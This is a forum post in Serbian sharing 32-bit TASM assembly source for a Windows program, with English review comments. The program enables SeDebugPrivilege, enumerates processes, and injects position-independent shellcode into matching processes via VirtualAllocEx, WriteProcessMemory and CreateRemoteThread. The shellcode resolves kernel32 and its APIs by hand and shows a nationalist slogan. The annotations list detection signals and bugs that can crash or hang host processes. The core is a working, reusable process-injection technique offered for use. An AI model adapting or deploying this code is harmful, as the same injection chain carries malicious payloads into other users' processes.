Evo jedan lep program za korisnike WinXP ili drugog NT based operativnog sistema =)
Na kraju imate binary ovog koda pa ko voli nek izvoli, program nije destruktivan uopste...
; TASM 32-bit flat-model source (Intel syntax, stdcall; `;` starts a comment).
; Builds a Win32 executable that enables SeDebugPrivilege, enumerates all
; processes and copies the position-independent RemoteThread routine (below)
; into every process it can open whose image base equals this program's own,
; then runs it there with CreateRemoteThread.
; Requires the TASM32 headers: the @pushsz macro comes from useful.inc, the
; MZ_* fields from mz.inc and the NT_*/OH_*/DE_*/DD_*/ED_* fields from pe.inc.
.586
.model flat, stdcall
locals                                 ; enable @@-prefixed local labels
jumps                                  ; let TASM widen out-of-range short jumps automatically
include \tasm32\include\useful.inc
include \tasm32\include\mz.inc
include \tasm32\include\pe.inc
; --- Win32 constants copied by hand (no windows.inc is included) ---
null equ 0
MB_OK equ 0
TOKEN_ADJUST_PRIVILEGES equ 20h
SE_PRIVILEGE_ENABLED equ 02h           ; LUID_AND_ATTRIBUTES.Attributes value
TOKEN_ASSIGN_PRIMARY equ (0001h)
TOKEN_DUPLICATE equ (0002h)
TOKEN_IMPERSONATE equ (0004h)
TOKEN_QUERY equ (0008h)
TOKEN_QUERY_SOURCE equ (0010h)
TOKEN_ADJUST_GROUPS equ (0040h)
TOKEN_ADJUST_DEFAULT equ (0080h)
TOKEN_ADJUST_SESSIONID equ (0100h)
STANDARD_RIGHTS_REQUIRED equ 0F0000h
; Full token access mask; far more than AdjustTokenPrivileges needs
; (TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY would do).
TOKEN_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED+TOKEN_ASSIGN_PRIMARY+TOKEN_DUPLICATE+ \
TOKEN_IMPERSONATE+TOKEN_QUERY+TOKEN_QUERY_SOURCE+ \
TOKEN_ADJUST_PRIVILEGES+TOKEN_ADJUST_GROUPS+TOKEN_ADJUST_SESSIONID+ \
TOKEN_ADJUST_DEFAULT)
; NOTE(review): SYNCHRONIZE is defined on the line AFTER it is used here.
; This appears to assemble because TASM expands the equate at its use
; site, by which point SYNCHRONIZE is known -- confirm if the build is
; ever reproduced.
PROCESS_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 0FFFh)
SYNCHRONIZE equ 100000h
PAGE_EXECUTE_READWRITE equ 40h         ; RWX pages: the protection the remote allocation asks for
MEM_COMMIT equ 1000h
MEM_RESERVE equ 2000h
; TOKEN_PRIVILEGES holding exactly one LUID_AND_ATTRIBUTES entry:
; PrivilegeCount (4) + Luid (8) + Attributes (4) = 16 bytes.
TOKEN_PRIVILEGES STRUCT
TP_count dd ?
TP_luid dq ?
TP_attrib dd ?
TOKEN_PRIVILEGES ENDS
; Imports resolved at link time (advapi32, kernel32, user32, psapi).
extrn OpenProcessToken:proc
extrn GetCurrentProcess:proc
extrn LookupPrivilegeValueA:proc
extrn AdjustTokenPrivileges:proc
extrn MessageBoxA:proc
extrn VirtualAllocEx:proc
extrn OpenProcess:proc
extrn WriteProcessMemory:proc
extrn ReadProcessMemory:proc
extrn CreateRemoteThread:proc
extrn EnumProcesses:proc
extrn CloseHandle:proc
extrn GetProcAddress:proc              ; declared but not called in this listing
extrn GetModuleHandleA:proc
extrn ExitProcess:proc
extrn ExitThread:proc                  ; declared but not called in this listing
.data
tp TOKEN_PRIVILEGES <>                 ; privilege record handed to AdjustTokenPrivileges
token dd ?                             ; this process's access-token handle
se_debug db "SeDebugPrivilege",0
mText db "SeDebugPrivilege has been activated",0
procBuf dd 1024 dup(0)                 ; PID array filled by EnumProcesses (zero-initialised)
proces dd ?                            ; BYTES written by EnumProcesses, not a PID count
api_name db "GetProcAddress",0         ; unused in this listing
dll db "kernel32.dll",0                ; unused in this listing
my_base dd ?                           ; this EXE's image base (HMODULE returned for NULL)
hProcess dd ?                          ; handle of the process currently being examined
counter dd ?                           ; loop index saved across API calls (ecx is caller-saved)
dummy dd ?                             ; scratch for out-parameters nobody reads
curbase dd ?                           ; address of PEB.ImageBaseAddress (PEB+8) in THIS process
base dd ?                              ; ImageBaseAddress value read from the target process
.code
;-----------------------------------------------------------------------
; start -- program entry point.
; 1. Enable SeDebugPrivilege in this process's token so OpenProcess can
;    reach processes it would otherwise be denied.
; 2. EnumProcesses, then for each PID: OpenProcess(PROCESS_ALL_ACCESS),
;    read the target's PEB.ImageBaseAddress, and if it equals this EXE's
;    own image base: VirtualAllocEx(RWX) + WriteProcessMemory +
;    CreateRemoteThread of the RemoteThread blob.
; This is the textbook remote-thread injection chain. From a detection
; standpoint the strong signals are the SeDebugPrivilege enable, the RWX
; cross-process allocation, WriteProcessMemory into it, and a remote thread
; whose start address is not backed by any mapped image.
; Registers: eax = API results, ecx = loop index, edi = &tp.TP_luid.
; Exits via ExitProcess; never returns.
;-----------------------------------------------------------------------
start:
call GetModuleHandleA, null            ; HMODULE of the EXE == its image base
mov my_base, eax
mov eax, dword ptr FS:[30h]            ; TEB+30h = PEB on 32-bit Windows
push eax
pop curbase                            ; curbase = PEB ...
add curbase, 8                         ; ... + 8 = &PEB.ImageBaseAddress (this process)
call GetCurrentProcess
call OpenProcessToken, eax, TOKEN_ALL_ACCESS, offset token   ; return value is never checked
lea edi, tp.TP_luid                    ; edi = &tp.Luid, filled in by the lookup below
call LookupPrivilegeValueA, null, offset se_debug, edi
mov tp.TP_count, 1
mov tp.TP_attrib, SE_PRIVILEGE_ENABLED
call AdjustTokenPrivileges, token, null, offset tp, size TOKEN_PRIVILEGES, null, null
test eax, eax
jz __exit
; A nonzero return only says the call itself succeeded. When the caller
; does not hold the privilege the API still returns nonzero and reports
; ERROR_NOT_ALL_ASSIGNED through GetLastError, which is not checked here,
; so this message box can appear even though SeDebugPrivilege was NOT enabled.
call MessageBoxA, null, offset mText, offset se_debug, MB_OK
__exit:
call CloseHandle, token
call EnumProcesses, offset procBuf, 1024*4, offset proces   ; proces = bytes written
mov ecx, proces
shr ecx, 2 ;divide by 4 -> ecx = number of PIDs returned
__loop_processes:
mov counter, ecx                       ; ecx is caller-saved; keep the index across API calls
mov eax, offset procBuf
mov eax, dword ptr[eax+ecx*4]          ; eax = procBuf[ecx]; ecx runs count..1, so procBuf[0]
                                       ; is never visited and the first read is the slot one
                                       ; past the last PID returned (0 from dup(0) unless the
                                       ; buffer is completely full)
call OpenProcess, PROCESS_ALL_ACCESS, 0, eax
test eax, eax
jz __next_process                      ; access denied / PID gone -> skip
mov hProcess, eax
; Reads 4 bytes at OUR PEB+8 address inside the TARGET: this assumes the
; target's PEB sits at the same virtual address as this process's PEB.
; Nothing verifies that assumption or the ReadProcessMemory return value.
call ReadProcessMemory, hProcess, curbase, offset base, 4, offset dummy
mov eax, base
cmp eax, my_base                       ; only processes sharing this EXE's image base
jne __close_handle
; RWX allocation in the target, sized to the RemoteThread blob.
call VirtualAllocEx, hProcess, null, end_RemoteThread-RemoteThread, \
MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
test eax, eax
jz __close_handle
push eax                               ; keep the remote address across the next call
call WriteProcessMemory, hProcess, eax, offset RemoteThread,\
end_RemoteThread-RemoteThread, offset dummy
pop eax                                ; eax = remote address = thread start address
; The returned thread handle is never closed (one handle leaked per injection).
call CreateRemoteThread, hProcess, null, null, eax, null, null, offset dummy
__close_handle:
call CloseHandle, hProcess
__next_process:
mov ecx, counter                       ; restore the index the API calls clobbered
loop __loop_processes                  ; ecx--, jump while nonzero
call ExitProcess, null
;-----------------------------------------------------------------------
; RemoteThread -- position-independent payload. The bytes from RemoteThread
; to end_RemoteThread are copied verbatim into the target process and run
; there as a thread, so nothing in this region may depend on an absolute
; address of this image: kernel32 is located by KernelBase (SEH-chain
; walk + header scan) and APIs are resolved by name with GetProc. The
; relative `call`s into KernelBase/GetProc are why the byte layout of this
; region must stay exactly as assembled.
; Behaviour: LoadLibraryA("user32.dll") then MessageBoxA(NULL, text,
; caption, MB_OK). No failure handling: a 0 from LoadLibraryA is passed
; straight into GetProc, which dereferences it -- the HOST process faults.
; @pushsz (useful.inc) is presumed to emit the string inline and push its
; address -- confirm against the macro definition.
; Thread signature: DWORD WINAPI RemoteThread(LPVOID unused)
;-----------------------------------------------------------------------
RemoteThread:
call KernelBase                        ; eax = kernel32 image base
@pushsz <"LoadLibraryA">               ; arg 2 of GetProc: api name
push eax                               ; arg 1 of GetProc: module base
call GetProc                           ; eax = &LoadLibraryA
@pushsz <"user32.dll">
call eax                               ; eax = LoadLibraryA("user32.dll") -> user32 base
@pushsz <"MessageBoxA">                ; arg 2 of GetProc: api name
push eax                               ; arg 1 of GetProc: user32 base
call GetProc                           ; eax = &MessageBoxA
push MB_OK                             ; uType
@pushsz <"Sloboda ili Smrt">           ; lpCaption
@pushsz <"Za Slobodu Srpstva i Srbije, poginuti nama zao nije">   ; lpText
push null                              ; hWnd
call eax                               ; MessageBoxA(NULL, lpText, lpCaption, MB_OK)
ret                                    ; back to the thread start stub; eax = thread exit code
;-----------------------------------------------------------------------
; KernelBase -- find kernel32's image base without any import.
; Walks the SEH chain from FS:[0] to its last record (Next == -1), takes a
; pointer stored in that record (assumed to lie inside kernel32 on the NT
; versions this was written for), rounds it down to the 64 KiB allocation
; granularity and scans downwards one granule at a time until it finds an
; "MZ" header whose e_lfanew leads to a "PE" signature.
; Out:    eax = kernel32 image base
; Clobb:  ebx, esi, edi, flags
; Not handled in the code:
;  - if the last SEH record does not point into kernel32 (depends on the
;    OS version), the result is some other module or garbage;
;  - the downward scan has no lower bound, so touching an unmapped page
;    raises an access violation in the host process;
;  - a stray "MZ" word at a granule boundary that is NOT followed by a
;    valid "PE" loops forever: __test_pe jumps back to __spin without
;    moving edi, and the same "MZ" matches again.
;-----------------------------------------------------------------------
KernelBase:
mov esi, FS:[0]                        ; esi = head of the SEH chain (EXCEPTION_REGISTRATION*)
__seh:
lodsd                                  ; eax = record.Next; esi now -> record.Handler
cmp eax, 0FFFFFFFFh                    ; -1 terminates the chain
je __find_kernel
mov esi, eax                           ; follow Next
jmp __seh
__find_kernel:
mov edi, [esi+4] ;seh handle  -- NOTE(review): esi already points at .Handler, so this reads
                 ;                the dword AFTER the handler (record+8), not the handler
                 ;                itself; it evidently still lands inside kernel32 on the
                 ;                original target -- confirm before relying on it elsewhere
and edi, 0FFFF0000h ;Wipe low word -> round down to the 64 KiB allocation granularity
__spin:
cmp word ptr[edi], 'ZM'                ; 'ZM' == 5A4Dh == "MZ" read as a little-endian word
jz __test_pe
sub edi, 10000h                        ; step one granule down
jmp __spin
__test_pe:
mov ebx, edi
add ebx, [ebx.MZ_lfanew]               ; ebx = base + e_lfanew -> candidate IMAGE_NT_HEADERS
cmp word ptr[ebx],'EP'                 ; "PE" signature distinguishes a real image from a stray "MZ"
je __ret_kernel_base
jmp __spin                             ; no "PE": retry (see header note on the infinite loop)
__ret_kernel_base:
mov eax, edi                           ; eax = image base
ret
;-----------------------------------------------------------------------
; GetProc -- minimal GetProcAddress replacement used by the injected payload.
; C-equivalent: void *__stdcall GetProc(void *handle, const char *api)
; In:     [esp+4] = handle (module base), [esp+8] = api (NUL-terminated name)
; Out:    eax = handle + AddressOfFunctions[AddressOfNameOrdinals[i]], where
;         AddressOfNames[i] equals api byte-for-byte, terminator included
; Clobb:  ebx, ecx, edx, esi, edi, flags (nothing is preserved)
; Limits (not handled in the code): there is no bound on NumberOfNames, so
;         a name that is not exported walks past the end of the name table
;         until something faults; forwarded exports are not recognised; a
;         NULL handle faults on the first header read.
; The `handle`/`api` equates are plain text equates and stay defined for
; the rest of the file, not just for this routine.
;-----------------------------------------------------------------------
GetProc:
handle equ dword ptr[ebp+8]            ; first argument (pushed last)
api equ dword ptr[ebp+12]              ; second argument (pushed first)
push ebp
mov ebp, esp
mov esi, api
__api_len:
lodsb                                  ; strlen loop, runs through the NUL
test al, al
jnz __api_len
sub esi, api                           ; esi = len + 1 (esi stopped just past the NUL)
mov ecx, esi                           ; ecx = bytes to compare per candidate name
mov ebx, handle
add ebx, [ebx.MZ_lfanew]               ; ebx -> IMAGE_NT_HEADERS
mov ebx, [ebx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add ebx, handle                        ; ebx -> export directory (RVA -> VA)
mov edx, [ebx.ED_AddressOfNames]
add edx, handle                        ; edx -> first entry of the name-RVA table
sub eax, eax                           ; eax = index into the name table
__find_api:
mov esi, [edx]
add esi, handle                        ; esi -> exported name string
mov edi, offset api                    ; NOTE(review): meant as edi = api (the wanted name);
                                       ; confirm how TASM encodes `offset` on an [ebp+12] operand
push ecx                               ; repe cmpsb consumes ecx; keep the length
cld
repe cmpsb                             ; ZF set only if all ecx bytes (NUL included) matched
pop ecx                                ; pop leaves flags alone, so ZF from cmpsb survives
jz __find_ordinal
add edx, 4                             ; next name RVA
inc eax
jmp __find_api
__find_ordinal:
mov esi, [ebx.ED_AddressOfNameOrdinals]
add esi, handle
sub edx, edx                           ; clear edx before the 16-bit partial write below
mov dx, word ptr[esi+eax*2]            ; dx = ordinal index for name #eax
mov esi, [ebx.ED_AddressOfFunctions]
add esi, handle
mov eax, [esi+edx*4]                   ; eax = function RVA
add eax, handle                        ; -> VA
mov esp, ebp
pop ebp
ret 8                                  ; stdcall: callee pops the two dword arguments
end_RemoteThread:                      ; end of the region copied into the target (end_RemoteThread-RemoteThread bytes)
end start                              ; entry point
i binary ->>>>
Ne pokretati u Win98 jer nema APIje koje ovaj program koristi =)))